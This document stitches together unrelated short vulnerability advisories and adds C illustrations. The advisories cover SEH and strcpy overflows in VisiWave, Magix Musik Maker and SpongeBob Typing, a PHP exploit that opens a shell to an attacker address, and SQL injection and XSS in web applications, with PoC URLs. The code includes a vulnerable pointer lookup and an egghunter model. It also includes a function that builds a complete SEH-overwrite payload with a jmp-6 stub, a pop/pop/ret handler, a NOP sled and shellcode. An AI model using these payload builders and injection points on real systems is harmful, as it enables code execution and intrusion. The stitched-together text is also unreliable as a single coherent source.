This exploit targets a buffer overflow vulnerability in PHP 5.3.3 through 5.3.6. It builds a sled of NOP instructions, appends the shellcode to it, and then opens a socket connection to the address specified in the EVIL_SPACE_ADDR constant, popping a shell.
This module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type' property (valid values include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text' and 'Image'), but if no match is found, the function that handles this routine ends up returning its input as the pointer, which is later used in a CALL DWORD PTR [EDX+10] instruction. This allows an attacker to overwrite it with an arbitrary value and results in code execution. A patch is available at visiwave.com; the fix XORs the return value to null when no match is found, and the value is then validated before use.
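The lookup defect described above, as an added illustration that is not VisiWave's code: a table lookup keyed on the 'Type' string that, on no match, hands back its own input, so the caller's later call through offset 0x10 of the "object" reads a DWORD out of attacker-controlled file data. The struct layout, handler names and the crafted_type sample are assumptions; only the failure pattern (input returned as pointer, later used in CALL DWORD PTR [EDX+10]) and the fix (null return, validated before use) come from the advisory.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical handler object. The advisory says the matched pointer is
 * later used in CALL DWORD PTR [EDX+10], so the model places a function
 * pointer at offset 0x10. */
typedef struct {
    char name[16];          /* offset 0x00..0x0f: the 'Type' value to match */
    int (*render)(void);    /* offset 0x10: what CALL DWORD PTR [EDX+10] invokes */
} type_handler;

static int render_properties(void) { return 1; }
static int render_graph(void)      { return 2; }

static type_handler handlers[] = {
    { "Properties", render_properties },
    { "Graph",      render_graph },
    /* 'TitlePage', 'Details', 'Table', 'Text', 'Image' omitted for brevity */
};
#define N_HANDLERS (sizeof handlers / sizeof handlers[0])

/* Vulnerable pattern: on no match, fall through and return the input string
 * itself, which the caller then treats as a handler object. */
type_handler *lookup_vuln(const char *type) {
    for (size_t i = 0; i < N_HANDLERS; i++)
        if (strcmp(handlers[i].name, type) == 0)
            return &handlers[i];
    return (type_handler *)type;            /* BUG: attacker data as object */
}

/* Fixed pattern, as the advisory describes the patch: null when nothing
 * matches, and callers validate before use. */
type_handler *lookup_fixed(const char *type) {
    for (size_t i = 0; i < N_HANDLERS; i++)
        if (strcmp(handlers[i].name, type) == 0)
            return &handlers[i];
    return NULL;
}

/* Nonzero when lookup_vuln() returns its own argument, i.e. when EDX would
 * point into attacker-controlled file data. Compared without dereferencing,
 * so this is safe to run. */
int lookup_vuln_returns_input(const char *type) {
    return (const void *)lookup_vuln(type) == (const void *)type;
}

/* The DWORD that CALL DWORD PTR [EDX+10] would fetch if EDX were the raw
 * Type string: bytes 0x10..0x13 of the attacker's value, little-endian as on
 * x86. Needs at least 0x14 bytes of input; returns 0 otherwise. */
unsigned long controlled_call_target(const char *type, size_t len) {
    const unsigned char *b = (const unsigned char *)type;
    if (len < 0x14)
        return 0;
    return (unsigned long)b[0x10]         | ((unsigned long)b[0x11] << 8) |
          ((unsigned long)b[0x12] << 16) | ((unsigned long)b[0x13] << 24);
}

/* Patched caller: validate, then dispatch. Returns -1 for an unknown Type. */
int dispatch_fixed(const char *type) {
    type_handler *h = lookup_fixed(type);
    if (h == NULL)
        return -1;
    return h->render();
}

/* Constructed attacker 'Type' value: 16 filler bytes, then the four bytes
 * that would be read as the call target. */
static const char crafted_type[] = "AAAAAAAAAAAAAAAA" "ABCD";
```

With the unpatched lookup, any unknown 'Type' makes the indirect call go through whatever sits 16 bytes into the attacker's string; the patched lookup never lets that pointer reach the call.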
An attacker can gain administrative access to the web application's database, leading to further attacks such as obtaining a shell on and rooting the server. The PoC is http://[sitename]/[pathToApplication]/photo.php?id=%InjectHere%, for example http://site.com/work/photo.php?id=%injectHere%19.
This module exploits a stack buffer overflow in Magix Musik Maker 16. When a specially crafted arrangement file (.mmm) is opened in the application, an unsafe strcpy() allows an attacker to overwrite an SEH handler. The exploit bypasses DEP and ASLR, and works on XP, Vista and Windows 7. An egghunter is used, so it may take several seconds to receive a shell.
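The two mechanisms named above (an unbounded strcpy() from file data into a fixed stack buffer, and an egghunter that locates the payload after the fact), as an added illustration that is not Magix's or the module's code. The field name, buffer size, egg tag and the sample "address space" are assumptions; only the defect class and the hunter's doubled-tag search come from the description.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define TITLE_MAX 64   /* hypothetical fixed-size stack buffer */

/* Vulnerable: copies a NUL-terminated field from the .mmm file with no
 * length check. A field of TITLE_MAX or more bytes runs past 'title' and,
 * on 32-bit Windows, into the SEH record further up the stack. Only called
 * with short input here. */
int read_title_vuln(const char *field) {
    char title[TITLE_MAX];
    strcpy(title, field);                 /* BUG: no bound */
    return (int)strlen(title);
}

/* Hardened: reject anything that does not fit, copy with an explicit
 * length, and always terminate. Returns -1 for oversized input. */
int read_title_fixed(const char *field, size_t field_len) {
    char title[TITLE_MAX];
    if (field_len >= TITLE_MAX)
        return -1;
    memcpy(title, field, field_len);
    title[field_len] = '\0';
    return (int)strlen(title);
}

/* Constructed oversized field: 128 'A's, twice TITLE_MAX. */
static const char oversized_field[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* Egghunter model. A real hunter walks memory page by page, using a syscall
 * to probe for unmapped pages (which is why it can take seconds), and looks
 * for the 4-byte tag twice in a row: the doubled tag distinguishes the
 * payload from the single copy of the tag inside the hunter itself. Here
 * the address space is a flat buffer. Returns the offset of the payload
 * (just after the second tag), or -1 if not found. */
long find_egg(const uint8_t *mem, size_t len, const char tag[4]) {
    for (size_t i = 0; i + 8 <= len; i++)
        if (memcmp(mem + i, tag, 4) == 0 && memcmp(mem + i + 4, tag, 4) == 0)
            return (long)(i + 8);
    return -1;
}

/* Constructed address-space sample: NOP noise, one lone "w00t" decoy (like
 * the copy inside the hunter), then the real doubled egg followed by a
 * stand-in payload byte. Requires egg_at > 104 and egg_at + 9 <= len.
 * Returns the offset where the payload was placed. */
size_t demo_memory(uint8_t *mem, size_t len, size_t egg_at) {
    memset(mem, 0x90, len);
    memcpy(mem + 100, "w00t", 4);             /* decoy: single tag only */
    memcpy(mem + egg_at, "w00tw00t", 8);
    mem[egg_at + 8] = 0xCC;                   /* stand-in for shellcode */
    return egg_at + 8;
}
```

The decoy matters: a hunter that matched a single tag would find its own code first, which is exactly why the egg is the tag repeated twice.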
The application suffers from multiple issues, including reflected and stored XSS, SQL injection, local file inclusion and URL redirection. Vulnerable parameters include 'name', 'comment', 'nid', 'submit1', 'email' and 'topic_id'.
MySchool version 7.02 is vulnerable to SQL injection. An attacker can inject malicious SQL via the 'ID' and 'Page_ID' parameters of the 'index.php' and 'show_page.php' scripts respectively, and can exploit this to gain access to the administrative control panel at 'http://localhost/myschool/login.php'.
PHPCaptcha, also known as Securimage, is a popular open source PHP CAPTCHA library. It is also used in popular WordPress plugins such as 'Fast Secure Contact Form'. Insufficient distortion in the audio version of the CAPTCHA allows an attacker to decode the CAPTCHA quickly by performing basic binary analysis of the generated audio file. The issue is compounded by the fact that even when the audio feature of the CAPTCHA has been disabled, it can still be reached by forced browsing to the /secure_play.php URI.
Requesting a single page directly triggers an error that discloses the full path of the web server and the vhost directory. The 'Quantity' field of Store Product does not sanitize user input before displaying it back to the user, allowing an attacker to inject and execute arbitrary JavaScript and/or HTML; this requires being logged in as Admin. The 'Zones Name & Code' fields of Locations/Taxes do not sanitize user input before storing it in the database and displaying it back to the user, likewise allowing an attacker to inject and execute arbitrary JavaScript and/or HTML.
This vulnerability allows an attacker to delete another user's uploaded file by changing the post ID and the file ID/name in the request to those of the target file.
This exploit is an SEH overwrite exploit for SpongeBob SquarePants Typing from The Learning Company. It uses a 'jump 6' short jump in the nSEH slot, a pop/pop/ret from mss32.dll, and a 247-byte windows/exec shellcode. It was tested on Windows XP SP3.
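The SEH overwrite layout that the 'jump 6' and pop/pop/ret combination relies on, as an added illustration that is not the exploit's own code. The offset to the SEH record, the gadget address and the placeholder shellcode are assumptions; the 247-byte windows/exec payload and the mss32.dll gadget are not reproduced. When the handler runs, [ESP+8] holds the address of the EXCEPTION_REGISTRATION record, so pop/pop/ret returns into nSEH; the 2-byte JMP SHORT +6 there skips its own trailing two bytes and the 4-byte handler address, landing right after the record.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define OFF_NSEH 256            /* assumed distance from buffer start to nSEH */
#define PPR_ADDR 0x10015A6Cu    /* placeholder for a pop/pop/ret gadget, not a real address */

/* "Jump 6": JMP SHORT +6 followed by two NOPs, written into the 4-byte nSEH
 * slot. The jmp is 2 bytes, so EIP is nSEH+2 when the displacement is
 * applied; +6 lands at nSEH+8, the first byte after the SEH record. */
static const uint8_t JMP6[4] = { 0xEB, 0x06, 0x90, 0x90 };

/* Where a short jump encoded at offset 'at' with signed displacement 'rel'
 * lands: address of the next instruction plus the displacement. */
size_t jmp_short_target(size_t at, int8_t rel) {
    return (size_t)((long)at + 2 + rel);
}

/* Layout: [filler][nSEH = jmp6][SEH = pop/pop/ret][nop sled][shellcode].
 * Writes the handler address little-endian as x86 expects. Returns total
 * bytes written, or 0 if 'cap' is too small. */
size_t build_seh_payload(uint8_t *out, size_t cap,
                         const uint8_t *sc, size_t sc_len, size_t nops) {
    size_t total = OFF_NSEH + 4 + 4 + nops + sc_len;
    if (cap < total)
        return 0;
    memset(out, 'A', OFF_NSEH);                         /* filler up to nSEH */
    memcpy(out + OFF_NSEH, JMP6, 4);                    /* nSEH */
    out[OFF_NSEH + 4] = (uint8_t)(PPR_ADDR & 0xFF);     /* SEH handler, LE */
    out[OFF_NSEH + 5] = (uint8_t)((PPR_ADDR >> 8) & 0xFF);
    out[OFF_NSEH + 6] = (uint8_t)((PPR_ADDR >> 16) & 0xFF);
    out[OFF_NSEH + 7] = (uint8_t)((PPR_ADDR >> 24) & 0xFF);
    memset(out + OFF_NSEH + 8, 0x90, nops);             /* short sled */
    memcpy(out + OFF_NSEH + 8 + nops, sc, sc_len);      /* shellcode */
    return total;
}

/* Offset at which execution resumes once pop/pop/ret has returned into nSEH
 * and the jmp6 has run. Must equal OFF_NSEH + 8, the start of the sled. */
size_t payload_entry_offset(void) {
    return jmp_short_target(OFF_NSEH, (int8_t)JMP6[1]);
}

/* Reads the 32-bit handler address back out of a built buffer, so a caller
 * can confirm it decodes to the intended gadget. */
uint32_t seh_handler_in(const uint8_t *buf) {
    const uint8_t *p = buf + OFF_NSEH + 4;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Constructed stand-in for shellcode: INT3 breakpoints only. */
static const uint8_t demo_sc[8] = { 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC };
```

The entry-offset check is the one worth keeping in a real exploit: if the filler length or the nSEH stub is off by even a byte, the jump lands inside the handler address rather than on the sled.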